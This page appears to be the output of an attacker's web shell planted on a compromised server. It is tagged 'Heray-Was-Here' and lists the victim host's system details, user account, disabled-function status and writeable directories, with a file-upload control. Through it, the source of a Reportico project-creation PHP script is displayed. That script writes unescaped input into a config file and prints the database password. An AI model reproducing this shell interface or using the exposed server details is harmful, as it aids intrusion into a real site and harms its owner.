Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/custom/reportes/include/reportico/projects/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/custom/reportes/include/reportico/projects/admin/createproject.xml.php
<?php
// Extract Criteria Options
$type = $_criteria["dbtype"]->getCriteriaValue("VALUE", false);
$name = $_criteria["database"]->getCriteriaValue("VALUE", false);
$host = $_criteria["host"]->getCriteriaValue("VALUE", false);
$server = $_criteria["server"]->getCriteriaValue("VALUE", false);
$user = $_criteria["user"]->getCriteriaValue("VALUE", false);
$password = $_criteria["password"]->getCriteriaValue("VALUE", false);
$protocol = $_criteria["protocol"]->getCriteriaValue("VALUE", false);
$baseurl = $_criteria["baseurl"]->getCriteriaValue("VALUE", false);
$project = $_criteria["project"]->getCriteriaValue("VALUE", false);
$title = $_criteria["projtitle"]->getCriteriaValue("VALUE", false);

if ( !$title ) { trigger_error ( "Specify Project Title", E_USER_NOTICE ); return; }
if ( !$type ) { trigger_error ( "Specify Database Type", E_USER_NOTICE ); return; }
if ( !$project ) { trigger_error ( "Specify Project Name", E_USER_NOTICE ); return; }
if ( !$name ) { trigger_error ( "Specify Database Name", E_USER_NOTICE ); return; }
if ( !$host ) { trigger_error ( "Specify Database Host", E_USER_NOTICE ); return; }
if ( !$user ) { trigger_error ( "Specify Database User", E_USER_NOTICE ); return; }
//if ( !$password ) { trigger_error ( "Specify Database Type", E_USER_NOTICE ); return; }
if ( !$baseurl ) { trigger_error ( "Specify Base URL", E_USER_NOTICE ); return; }
global $g_debug_mode;
$g_debug_mode = true;
;

$test = new reporticoDatasource();

$test->driver = $type;
$test->user_name = $user;
$test->password = $password;
$test->host_name = $host;
$test->database = $name;
$test->server = $server;
$test->protocol = $protocol;
$test->connect(true);

if ( $test->connected )
    ReporticoApp::handleDebug("Connection to Database succeeded", 0);
else
   trigger_error("Connection to Database failed", E_USER_NOTICE);

$proj_parent = findBestLocationInIncludePath( "projects" );
$proj_dir = $proj_parent."/$project";
$proj_conf = $proj_dir."/config.php";
$proj_menu = $proj_dir."/menu.php";
$proj_lang = $proj_dir."/lang.php";

$proj_template = $proj_parent."/admin/config.template";
$menu_template = $proj_parent."/admin/menu.template";
$lang_template = $proj_parent."/admin/lang.template";


if ( !file_exists ( $proj_parent ) )
{
    trigger_error ("Projects area $proj_parent does not exist - cannot write project", E_USER_NOTICE);
    return;
}

if ( !is_writeable ( $proj_parent  ) )
{
    trigger_error ("Projects area $proj_parent is not writeable - cannot write project", E_USER_NOTICE);
    return;
}

if ( file_exists ( $proj_dir ) )
{
    trigger_error ("Projects area $proj_dir already exists - cannot write project", E_USER_NOTICE);
    return;
}
else
if ( !mkdir ( $proj_dir ) )
{
    trigger_error ("Failed to create project directory $proj_dir", E_USER_NOTICE);
    return;
}

if ( !is_writeable ( $proj_dir ) )
{
   if ( ! chmod ( $proj_dir, "u+rwx") )
   {
    trigger_error ("Failed to make project directory $proj_dir writeable ", E_USER_NOTICE);
    return;
   }
}


$txt = file_get_contents($proj_template);
$txt = preg_replace ( "/<<BASEURL>>/", $baseurl, $txt);
$txt = preg_replace ( "/<<DRIVER>>/", $type, $txt);
$txt = preg_replace ( "/<<DBPASSWORD>>/", $password, $txt);
$txt = preg_replace ( "/<<DBHOST>>/", $host, $txt);
$txt = preg_replace ( "/<<DBSERVER>>/", $server, $txt);
$txt = preg_replace ( "/<<DBNAME>>/", $name, $txt);
$txt = preg_replace ( "/<<DBPROTOCOL>>/", $protocol, $txt);
$txt = preg_replace ( "/<<DBUSER>>/", $user, $txt);
echo "<PRE>";
echo $txt;
echo "</PRE>";
    trigger_error ("Failed to create project directory $proj_dir", E_USER_NOTICE);
    return;

$retval = file_put_contents($proj_conf, $txt);

$txt = file_get_contents($menu_template);
$txt = preg_replace ( "/<<PROJTITLE>>/", $title, $txt);
$retval = file_put_contents($proj_menu, $txt);
$txt = file_get_contents($lang_template);
$retval = file_put_contents($proj_lang, $txt);


ReporticoApp::handleDebug("Project Created", 0);


?>

Hry